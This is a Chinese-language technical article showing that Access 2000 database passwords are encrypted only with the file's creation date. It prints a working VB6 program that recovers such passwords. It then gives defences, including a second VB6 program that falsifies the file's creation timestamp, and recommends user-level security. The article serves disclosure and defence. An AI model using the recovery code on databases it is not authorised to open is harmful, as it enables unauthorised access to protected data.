如果你過分信任 Access 2000數據庫的密碼保護,你可能會因此而蒙受損失。這是因為Access 2000的數據庫級密碼並不安全,相反它很脆弱,甚至下面這段非常小的程序就可以攻破它: ' 程序一(VB6):Access 2000密碼破譯 Private Sub Command1_Click() Const Offset = &H43 ' 文件偏移地址:Access數據庫從此處開始存放加密密碼 Dim bEmpty(1 To 2) As Byte, bPass(1 To 2) As Byte Dim I As Integer, Password As String ' 打開一個空數據庫作為參照 Open "D:\VB6_Test\MDB_Password\New_Empty_DB.mdb" For Binary As #1 ' 打開被密碼保護的數據庫 Open "D:\VB6_Test\MDB_Password\Pass_Protected_DB.mdb" For Binary As #2 Seek #1, Offset Seek #2, Offset For I = 1 To 20 ' Access 2000 數據庫密碼最長允許20位 Get #1, , bEmpty ' 其中每位密碼占兩個字節 Get #2, , bPass ' 一個漢字也僅是一位密碼,占兩個字節 If (bEmpty(1) Xor bPass(1)) 0 Then Password = Password Chr(bEmpty(1) Xor bPass(1)) ' 將密碼解密 End If Next Close 1, 2 MsgBox "Password:" Password ' 顯示密碼 End Sub 一、深入分析 上述程序成功的關鍵是使用了一個空數據庫(New_Empty_DB.mdb)。該數據庫的創建日期必須與被密碼保護的數據庫(Pass_Protected_DB.mdb)相一致。 換句話說,Access 2000 僅僅是使用“數據庫創建日期”來加密用戶密碼。 應注意的是:上面的“創建日期”只是操作系統級的,也就是 Windows記錄在文件夾目錄裡的信息(根據文件名的長短,每個文件在目錄裡占用至少32個字節,包括:文件名、屬性、文件大小、首蔟號、創建時間、修改時間和訪問時間等)。 Access 2000 在數據庫中也記錄了該數據庫的“創建日期”。加密數據庫密碼的正是數據庫內部記錄的這個“創建日期”。該日期只有在數據庫被成功打開後才能看到。但在一般情況下,操作系統級的以及數據庫內保存的“創建日期”是完全一樣的,因此這為破譯者提供了方便。 上述程序中還有一點需要說明:為簡明起見,解密密碼時僅處理了雙字節的首字節,因此它僅對非漢字密碼有效。若要解密漢字密碼,須對雙字節均做處理。 二、防范措施 1、隱藏“創建日期” 從上面的分析可以看出,既然“創建日期”是破譯的關鍵,那麼我們應“對症下藥”,將真實的“創建日期”隱藏起來。 第一步,,創建數據庫時,使用一個“不可思議的、別人不易猜測”的日期。做法為:修改 Windows系統日期,例如改為2026年05月15日,創建數據庫後再將系統日期改回。這個“不可思議”的日期即為該數據庫的真實“創建日期”。 第二步,修改操作系統級的“創建日期”。上述第一步完成後,該數據庫在操作系統級的創建日期也是2026年05月15日,必須加以修改,以達到隱藏真實創建日期的目的。修改操作系統級的“創建日期”可以由下面的程序二完成。 ' 程序二(VB6):修改文件在操作系統級的“創建日期” Private Type FILETIME dwLowDateTime As Long dwHighDateTime As Long End Type Private Type SYSTEMTIME wYear As Integer wMonth As Integer wDayOfWeek As Integer wDay As Integer wHour As Integer wMinute As Integer wSecond As Integer wMilliseconds As Integer End Type Private Const GENERIC_WRITE = &H40000000 Private Const OPEN_EXISTING = 3 Private Const FILE_SHARE_READ = &H1 Private Const FILE_SHARE_WRITE = &H2 Private Declare Function SetFileTimeWrite Lib "kernel32" Alias _ "SetFileTime" (ByVal hFile As Long, lpCreateTime As FILETIME, _ ByVal NullP As Long, ByVal NullP2 As Long) As Long Private Declare Function SystemTimeToFileTime Lib "kernel32" _ (lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" _ (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal _ dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal _ dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, _ ByVal hTemplateFile As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) _ As Long Private Declare Function LocalFileTimeToFileTime Lib "kernel32" _ (lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long Private Sub Command1_Click() Dim Year As Integer, Month As Integer, Day As Integer Dim Hour As Integer, Minute As Integer, Second As Integer Dim TimeStamp As Variant, Filename As String, X As Integer Year = 2001: Month = 3: Day = 13 ' 准備設定的“創建日期”
Hour = 12: Minute = 0: Second = 26 TimeStamp = DateSerial(Year, Month, Day) TimeSerial(Hour, Minute, Second) Filename = "D:\VB6_Test\MDB_Password\Pass_Protected_DB.mdb" ' 目標文件名 X = ModifyFileStamp(Filename, TimeStamp) End Sub Function ModifyFileStamp(Filename As String, TimeStamp As Variant) As Integer Dim X As Long, Handle As Long, System_Time As SYSTEMTIME Dim File_Time As FILETIME, Local_Time As FILETIME System_Time.wYear = Year(TimeStamp): System_Time.wMonth = Month(TimeStamp) System_Time.wDay = Day(TimeStamp) System_Time.wDayOfWeek = Weekday(TimeStamp) - 1 System_Time.wHour = Hour(TimeStamp): System_Time.wSecond = Second(TimeStamp) System_Time.wMilliseconds = 0 X = SystemTimeToFileTime(System_Time, Local_Time) X = LocalFileTimeToFileTime(Local_Time, File_Time) ' 轉換成可用的類型 Handle = CreateFile(Filename, GENERIC_WRITE, FILE_SHARE_READ Or _ FILE_SHARE_WRITE, ByVal 0&, OPEN_EXISTING, 0, 0) ' 打開文件 X = SetFileTimeWrite(Handle, File_Time, ByVal 0&, ByVal 0&) ' 設置日期 CloseHandle Handle ' 關閉文件 End Function 可以看出,隱藏“創建日期”的方法對破譯者來說只是增大了破譯的工作量,增加了破解試驗的次數。只有將該方法與下述的“方法二”相結合,才能達到“既治標又治本”的效果。不過在一般的情況下“方法一”已夠用,因為如果破譯者起始使用的測試日期與最終的真實日期相差百年,他需要付出數萬次的努力! 2、使用用戶級安全機制 通過設置不同的用戶帳號和組帳號對數據庫中的各種資源進行權限管理。這種加強了的安全機制雖然給日常使用(尤其是單用戶使用)帶來了不便,但在有安全隱患的地方依然有設置的必要。 三、結論 所謂“道高一尺魔高一丈”,因為這世上並沒有絕對的安全。上述方法一的目的是提高破譯的成本以達到常人難以接受的程度;而方法二的初衷是增加密碼的數量。兩種方法的結合足以使破譯者望而卻步。不過這並不意味著百分之百的安全。但從思想上提高安全意識,防患於未然,這畢竟是正確的選擇。